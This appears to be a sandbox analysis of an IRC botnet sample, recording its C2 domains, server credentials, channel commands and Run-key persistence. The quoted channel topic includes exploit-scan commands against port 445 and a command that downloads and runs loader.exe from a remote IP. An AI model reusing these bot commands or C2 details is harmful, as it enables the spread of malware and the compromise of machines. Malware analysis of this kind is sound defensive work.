Name                      Query Type  Query Result   Successful  Protocol
kat.jatajoo.ru            DNS_TYPE_A  91.207.6.166   1
gandu.marcandpatrick.net  DNS_TYPE_A  218.61.22.10   1
hot.jatajoo.ru            DNS_TYPE_A  89.149.244.22  1
218.61.22.10:1544
Nick: [00_AUT_XP_5687882]
Username: SP3-980
Server Pass: pacodedd
Joined Channel: ##f## with Password open
Channel Topic for Channel ##F##: “.asc -S|.http http://rapidshare.com/files/314789063/bay|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r|.r.getfile http://89.149.244.22/loader.exe C:\iehn.exe 1”
Private Message to Channel ##F##: “download// Created process: “C:\iehn.exe”, PID: “
Private Message to Channel #modes: “HTTP SET http://rapidshare.com/files/314789063/bay”
Private Message to Channel ##F##: “scan// Random Port Scan started on 128.130.x.x:445 with a delay of 3 seconds for 0 minutes using 35 threads.”
Private Message to Channel ##F##: “download// File download: 27.1KB to: C:\iehn.exe @ 27.1KB/sec.”
Private Message to Channel ##F##: “scan// Random Port Scan started on 128.x.x.x:445 with a delay of 3 seconds for 0 minutes using 15 threads.”
Private Message to Channel ##F##: “scan// Trying to get external IP.”
PASS pacodedd
Other details
* The following ports were open in the system:
  Port  Protocol  Process
  1055  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  1056  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  1057  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  1058  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  1280  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2383  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2384  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2385  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2386  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2387  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2388  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2389  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2390  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2391  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2392  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2393  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2394  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2395  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2396  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2397  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2398  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2399  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2400  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2401  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2402  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2403  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
  2404  TCP       wind7upd.exe (%Windir%\wind7upd.exe)
Registry Modifications
* The following Registry Keys were created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
    + Microsoft Driver Setup = “%Windir%\wind7upd.exe”
      so that wind7upd.exe runs every time Windows starts
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Microsoft Driver Setup = “%Windir%\wind7upd.exe”
      so that wind7upd.exe runs every time Windows starts
Memory Modifications
* There was a new process created in the system:
  Process Name  Process Filename       Main Module Size
  wind7upd.exe  %Windir%\wind7upd.exe  339 968 bytes